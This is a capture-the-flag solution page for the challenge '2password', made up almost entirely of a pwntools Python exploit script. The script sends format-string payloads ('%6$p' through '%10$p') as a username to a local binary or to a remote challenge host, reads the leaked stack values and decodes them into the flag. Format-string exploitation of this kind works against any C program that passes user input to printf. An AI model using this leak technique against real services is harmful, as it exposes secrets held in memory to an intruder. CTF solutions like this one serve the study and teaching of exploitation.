2password

#format-string#solution-only

Contents

Source


Solution

#!/usr/bin/env python3

from pwn import *
from termcolor import colored
from tqdm import tqdm

exe = ELF("./chall_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")
rop = ROP(exe)

context.binary = exe
context.terminal = ["alacritty", "-e", "sh", "-c"]
dbginit = """
b *main
c
"""

def conn():
    if args.REMOTE:
        r = remote("chall.lac.tf", 31142)
    else:
        r = process([exe.path])
        if args.GDB:
            gdb.attach(r, gdbscript=dbginit)
    return r

def read_mem():
    flag = b''
    for i in tqdm(range(6, 11)):
        r = process([exe.path])
        p = f"%{i}$p".encode("ascii")
        r.sendlineafter(b'username: ', p)
        r.sendlineafter(b'password1: ', b'1')
        r.sendlineafter(b'password2: ', b'2')
        r.recvuntil(b'user ')
        flag += r.recvuntil(b'\n').strip(b'\n') + b', '
        r.clean()
    flag = flag.split(b', ')
    for i in range(len(flag)-1):
        print((str(i + 1) + ":").ljust(5), end="")
        print(flag[i].ljust(20),end="")
        if flag[i] != b'(nil)':
            print("  --> ",end="")
            print(p64(int(flag[i],16)),end="")
        print()

def read_mem_remote():
    p = b''
    r = conn()
    for i in range(6,11):
        p += f"%{i}$p, ".encode("ascii")
    r.sendlineafter(b'username: ', p)
    r.sendlineafter(b'password1: ', b'1')
    r.sendlineafter(b'password2: ', b'2')
    r.recvuntil(b'user ')
    leak = r.recvuntil(b'\n').strip(b'\n').split(b', ')
    print(leak)
    flag = b''
    for f in leak:
        if (f != b'(nil)') & (f != b''):
            flag += p64(int(f.decode("ascii"),16))
        else:
            flag += b'\x00'*8
    print(flag)




def main():

    read_mem_remote()



if __name__ == "__main__":
    main()